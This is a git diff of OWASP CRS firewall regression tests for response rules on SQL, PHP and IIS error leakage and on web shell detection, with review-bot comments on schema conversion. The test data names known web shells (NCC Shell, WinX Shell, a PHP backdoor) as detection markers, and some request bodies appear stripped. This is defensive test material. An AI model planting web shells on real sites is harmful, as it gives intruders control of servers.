/var/www/sivusto/handler.php on line 56"} + output: + log_contains: "id \"951240\"" + - test_id: 2 desc: "Matching PostgreSQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"} - output: - log_contains: "id \"951240\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"} + output: + log_contains: "id \"951240\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml index f711ff813..473ffacda 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951250.yaml" description: "Regression tests for rule 951250" +rule_id: 951250 tests: - - test_title: 951250-1 + - test_id: 1 desc: "Matching SQLite SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"} - output: - log_contains: "id \"951250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"} + output: + log_contains: "id \"951250\"" diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml index e8f93739f..c26b567bc 100644 --- a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml +++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml 
@@ -1,28 +1,26 @@ --- meta: author: "azurit" - enabled: true - name: "951260.yaml" description: "Regression tests for rule 951260" +rule_id: 951260 tests: - - test_title: 951260-1 + - test_id: 1 desc: "Matching Sybase SQL Information Leakage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"} - output: - log_contains: "id \"951260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"} + output: + log_contains: "id \"951260\"" diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml index d4dfc5e5c..d3f6492a4 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml 
@@ -1,107 +1,101 @@ --- meta: author: "M4tteoP, Esad Cetiner, azurit" - enabled: true - name: "953100.yaml" description: "Tests for rule 953100" +rule_id: 953100 tests: - - test_title: 953100-1 + - test_id: 1 desc: "'File size is' leads to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Maximum allowed file size is 10 MB" - output: - no_log_contains: id "953100" - - test_title: 953100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Maximum allowed file size is 10 MB" + output: + no_log_contains: id "953100" + - test_id: 2 desc: "'Invalid date' Wordpress FP, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Invalid date selected" - output: - no_log_contains: id "953100" - - test_title: 953100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Invalid date selected" + output: + no_log_contains: id "953100" + - test_id: 3 desc: "'The function' might lead to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "please review the function" - output: - no_log_contains: id "953100" - - test_title: 953100-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "please review the function" + output: + no_log_contains: id "953100" + - test_id: 4 desc: "'Static function' might lead to FPs, it should not match at PL1" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "This is a static function" - output: - no_log_contains: id "953100" - - test_title: 953100-5 + - input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "This is a static function" + output: + no_log_contains: id "953100" + - test_id: 5 desc: "'cannot be empty is too common for PL1 GH isue #3399" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - uri: "/post" - data: "Field cannot be empty." - output: - no_log_contains: id "953100" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "Field cannot be empty." + output: + no_log_contains: id "953100" diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml index 57a366f04..c39660999 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml 
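Review bot: The new `output` lines in this hunk keep the assertion as a plain scalar, `no_log_contains: id "953100"`, while the 951xxx files converted in the same series write it as a quoted string, `log_contains: "id \"951200\""`; the plain form is valid YAML only because the value does not begin with the quote, so it is fragile to any later edit and inconsistent with the rest of the suite. Suggest `no_log_contains: "id \"953100\""` for all five tests here, and the same `"id \"953101\""` / `"id \"954120\""` form in the 953101 and 954120 hunks. While the `desc` of test 5 is being carried over, the unbalanced opening quote in `'cannot be empty` and the typo `isue` could be fixed in the same pass.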
@@ -1,112 +1,106 @@ --- meta: author: "M4tteoP, Esad Cetiner, azurit" - enabled: true - name: "953101.yaml" description: "Tests for rule 953101" +rule_id: 953101 tests: - - test_title: 953101-1 + - test_id: 1 desc: "'File size is' leads to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Maximum allowed file size is 10 MB"} - output: - log_contains: id "953101" - - test_title: 953101-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Maximum allowed file size is 10 MB"} + output: + log_contains: id "953101" + - test_id: 2 desc: "'Invalid date' leads to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Invalid date selected"} - output: - log_contains: id "953101" - - test_title: 953101-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Invalid date selected"} + output: + log_contains: id "953101" + - test_id: 3 desc: "'The function' might lead to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "Please review the function"} - output: - log_contains: id "953101" - - test_title: 953101-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "Please review the function"} + output: + log_contains: id "953101" + - test_id: 4 desc: "'Static function' might lead to FPs at PL1, it should match at PL2" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "This is a static function"} 
- output: - log_contains: id "953101" - - test_title: 953101-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "This is a static function"} + output: + log_contains: id "953101" + - test_id: 5 desc: "'cannot be empty is too common for PL1, it should match at PL2 GH isue #3399" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: |- - {"body": "cannot be empty."} - output: - log_contains: id "953101" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: |- + {"body": "cannot be empty."} + output: + log_contains: id "953101" diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml index 23d215a47..5070e5e5d 100644 --- a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml +++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml 
@@ -1,151 +1,143 @@ --- meta: author: "fzipi, azurit" - enabled: true - name: "953120.yaml" description: "Positive tests for rule 953120" +rule_id: 953120 tests: - - test_title: 953120-1 + - test_id: 1 desc: "Just something that returns \"}" - output: - log_contains: "id \"953120\"" - - test_title: 953120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log_contains: "id \"953120\"" + - test_id: 2 desc: "Negative test, returns \"}" - output: - log_contains: "id \"953120\"" - - test_title: 953120-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log_contains: "id \"953120\"" + - test_id: 6 desc: "Negative test, returns \"}" - output: - log_contains: "id \"953120\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"\"}" + output: + log_contains: "id \"953120\"" diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml index 4631f2c6f..905f7d154 100644 
--- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml @@ -1,25 +1,23 @@ --- meta: author: "Andrew Howe" - enabled: true - name: "954100.yaml" description: "Tests for rule 954100" +rule_id: 954100 tests: - - test_title: 954100-1 + - test_id: 1 desc: 'Returns C:\inetpub in the response body' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - uri: "/reflect" - data: "{\"body\": \"C:\\\\inetpub \\n\"}" - output: - log_contains: "id \"954100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + uri: "/reflect" + data: "{\"body\": \"C:\\\\inetpub \\n\"}" + output: + log_contains: "id \"954100\"" diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml index c57700a45..a9eed253a 100644 --- a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml +++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml 
@@ -1,45 +1,42 @@ --- meta: author: "Felipe Zipitria, azurit" - enabled: true - name: "954120.yaml" description: "Tests for rule 954120 - IIS Error information disclusure" +rule_id: 954120 tests: - - test_title: 954120-1 + - test_id: 1 desc: 'Match IIS error page' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "text=404.14 - URL too long."} - output: - log_contains: id "954120" - - test_title: 954120-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "text=404.14 - URL too long."} + output: + log_contains: id "954120" + - test_id: 2 desc: 'Match IIS error page' stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed."} - output: - log_contains: id "954120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "text=500.15 
- Server error: Direct requests for GLOBAL.ASA are not allowed."} + output: + log_contains: id "954120" diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml index 52e743d0b..f052a9dfb 100644 --- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml @@ -1,70 +1,66 @@ --- meta: author: "azurit" - enabled: true - name: "955100.yaml" description: "Regression tests for rule 955100" +rule_id: 955100 tests: - - test_title: 955100-1 + - test_id: 1 desc: "Matching web shell NCC Shell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "

.:NCC:. Shell v"} - output: - log_contains: "id \"955100\"" - - test_title: 955100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "

.:NCC:. Shell v"} + output: + log_contains: "id \"955100\"" + - test_id: 2 desc: "Matching web shell Simple PHP backdoor" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": ""} - output: - log_contains: "id \"955100\"" - - test_title: 955100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: |- + {"body": ""} + output: + log_contains: "id \"955100\"" + - test_id: 3 desc: "Matching web shell WinX Shell" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: |- - {"body": "-:[GreenwooD]:- WinX Shell"} - output: - log_contains: "id \"955100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: 
"HTTP/1.1" + uri: "/reflect" + data: |- + {"body": "-:[GreenwooD]:- WinX Shell"} + output: + log_contains: "id \"955100\"" diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml index 68483c2cf..8a95998fd 100644 --- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml @@ -1,27 +1,24 @@ --- meta: author: "azurit" - enabled: true - name: "955260.yaml" description: "Regression tests for rule 955260" tests: - - test_title: 955260-1 + - test_id: 1 desc: "Matching web shell Ru24PostWebShell. Our test infrastructure, currently, cannot run this test properly because of multiline output, so it's disabled." stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.1" - uri: "/reflect" - data: "{\"body\": \"\\n\\nRu24PostWebShell -\"}" - output: - log_contains: "id \"955260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.1" + uri: "/reflect" + data: "{\"body\": \"<html>\\n<head>\\n<title>Ru24PostWebShell -\"}" + output: + log_contains: "id \"955260\"" diff --git a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml index 46a3b5433..9f1457ae6 100644 
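Review bot: On the new side the request body for test 2 (Simple PHP backdoor) is the empty string `{"body": ""}`, and test 1's body runs across blank lines before `.:NCC:. Shell v`, yet both assert `log_contains: "id \"955100\""`. If the markup was only stripped by this rendering the file is fine as committed; if the bodies really are empty the assertions have nothing to match and the tests would fail rather than prove the response rule works. Worth confirming against the committed file that each body still carries the string the rule keys on.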
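Review bot: This file drops `name: "955260.yaml"` and `enabled: true` but, unlike 954120, 955100, 959100 and 980170 in the same commit, gets no `+rule_id: 955260` after the description, so a consumer that reads `rule_id` from the new schema will not find it here. Adding `rule_id: 955260` keeps the meta block in step with the other converted files. The test description also says the test is disabled; with `enabled: true` gone there is no visible flag expressing that state, so it is worth checking that the new format has an equivalent or that the note is now stale.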
--- a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml +++ b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml 
